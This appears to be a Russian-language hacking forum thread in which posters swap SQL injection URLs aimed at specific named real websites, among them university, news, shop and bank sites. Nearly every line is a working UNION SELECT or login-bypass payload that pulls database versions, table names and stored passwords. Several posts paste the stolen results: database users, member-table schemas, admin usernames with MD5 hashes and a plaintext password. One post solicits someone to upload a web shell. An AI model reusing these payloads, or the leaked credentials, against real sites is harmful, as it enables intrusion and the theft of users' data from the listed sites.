http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+database(),user(),3,4,5,6,user(),8,9,10,11,VERSION(),13,14,15,16,17/* если честно, я не знаю толком что это, просто пытался освоить принцип перебора занваний полей
http://bin.ru/office_location.php?office_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_name,14,AES_DECRYPT(AES_ENCRYPT(version(),%20%200x71),0x71),16,17,18,19+from+information_schema.tables+limit+1,1/* http://www.yaruse.ru/main.php?page=cvetmet&top=-1+union+select+CONCAT(user,CHAR(32,124,124,32),password),2,3,4,5,6+from+mysql.user/* http://hns.cm.ru/ доступ к форуму и партнерам: ' or 'a'='a
http://www.wanderinggoblin.com/literaturedetail.php?id=430%20union%20select%201,2,3,concat(version(),char(58),user(),char(58),database(),char(58),password,char(58),user),5,6%20from%20mysql.user/*
БАНК http://www.moneyburg.ru/ Надо поглубже его проанализировать конечно: Вход : login:1' or 1=1/* pass:неважно ПРОВАЙДЕР uralsmart.ru Опять таки mssql. Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа: ' or 'a'='a " or 1=1-- or 1=1-- а тока ругается -ХЕЛП ну и еще: http://www.chermet-s.ru/mess/?i=1&ii=-1+union+select+1,VERSION(),table_name,4,5,6,7,8+from+information_schema.tables/*
и вот опять чо то не выходт... http://journalism.berkeley.edu/events/details.php?ID=394'+union+select+1,2,3,4,5,6,7,8/*
http://journalism.berkeley.edu/events/details.php?ID=394+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/* имена таблиц сам подбирай.....
Вот есть такое _http://ksvu.kiev.ua/viewabc.php?letter=0'+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10/* С MySQL inj работать особо неумею, пробовал подбирать имена таблиц (наверное неправельно) не получилось... Кто может, помогите... Пасиб!
http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+from+guestbook/* http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,3,6,7,8,9,10+from+forum/* Версия мускула четвертая а это уже само по себе геморой.............. Вот тебе пара таблиц а имена полей и другие таблицы ты уже сам...
Code: http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* beermatadmin:beermatadmin@localhost:5.0.22-Debian_0ubuntu6.06.3-log Code: http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables+limit+16,1/* Code: a_member blog blog_comment bm_newsletter bm_recipients competition competition_entry downloads event event_attendee event_category member(member_id, email_address, password, title, first_name, last_name, job_title, organisation, web_address, post_code, county, town, region, country, industry, newsletter, event_announcements, accept_terms, allow_3p_contact, blog_alerts, member_type_id, expiry_date, subscription_reference, eu_vat_number, profile_text, image, image_height, image_width, member_status, hash_code, session, ip_address, key_value, new_email, added, updated) mm_newsletter mm_recipients mm_recipients_20070121 mm_recipients_20070319 mm_recipients_20070329 mm_recipients_20070501 mm_recipients_20070529 mm_recipients_kick mm_recipients_old newsletter offers payment_transactions private_message shop_cart shop_catalogue shop_category shop_customer sys_blog_rejection sys_country sys_industry sys_member_type sys_parameter sys_profanity sys_region sys_title twatch_agents twatch_agentsc twatch_agentsc_mon twatch_allreadt twatch_browsersc twatch_browsersc_mon twatch_cousc twatch_cousc_mon twatch_errors twatch_general twatch_hits twatch_hits_mon twatch_hourly twatch_hourly_mon twatch_ipcou twatch_ippages twatch_ipreadt twatch_ips twatch_miles twatch_monreadt twatch_pages twatch_pagesc twatch_pagesc_mon twatch_paths twatch_refdoms twatch_refgroupsc twatch_refgroupsc_mon twatch_refs twatch_refsc twatch_refsc_mon twatch_robotsc twatch_robotsc_mon twatch_sessions twatch_sessions_mon twatch_weekday_mon
Code: http://www.[COLOR=Magenta]studyinuk[/COLOR].ru/news.shtml?id=3502%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version(),id,login,pass),0x71),0x71),4,5,6,7,8,9,10%20from%20users/*
Code: http://www.mediapool-berlin.de/frameset.php3?Bereich=3&Sprache=d'+and+1=2+union+select+1,2,3,4,version(),6,7,8,9/* ПР4 Code: http://auroraforum.stanford.edu/events.php?id=-1+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),8,9,10,11,12,13,14,15,16/* Едушка Code: http://www.teriin.org/case_inside.php?id=-17087'+union+select+1,version(),3,4,5,6,7,8,9,10,11/* ПР7 Code: http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+information_schema.tables+limit+38,1/* ПР5
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(0x12,version(),0x12,user(),0x12),concat(0x21,user,0x21,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/* version:4.1.22 user:boxnews_a2k@localhost admin:admin pass(md5):d23d8b79f575bcc0eedfb8c4e2f13540 pass:repz Админка на украинском (бля я не фига не понял =) ) http://www.sakhalin.environment.ru/news.php?id=-1+union+select+1,2,concat(0x21,version(),0x21,user(),0x21),4,5+from+news/* version:4.0.27 user:sakhvatch@localhost таблицы особо не старалса подбирать (тока news нашел и усе) http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,concat(0x21,version(),0x21,user(),0x21),5,6,7,8,9/* version:4.0.27-log user:metalistfans@localhost
http://www.dm-centre.ru/inner.php?page=podrazdel&id=-1+union+select+version(),concat(username,0x21,user_password)+from+phpbb_users/* На форум: ADMIN 827ccb0eea8a706c4c34a16891f84e7b
Code: http://www.download.ru/authors/?task=statistik&program=31099+order+by+3--&type=1 юнион не работает, вывести не смог.
http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/* http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+from+mysql.user/*
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной Ну вроде бы обычная скуля, ничего примечательного, однако: Кавычки не фильтруются есть file priv... есть доступ к mysql.user Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь. Удачи =) PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят.
Code: http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,TABLE_NAME,4%20FROM+INFORMATION_SCHEMA.TABLES%20limit%200,1/* Code: http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,column_name,4%20FROM+information_schema.columns%20limit%200,1/*
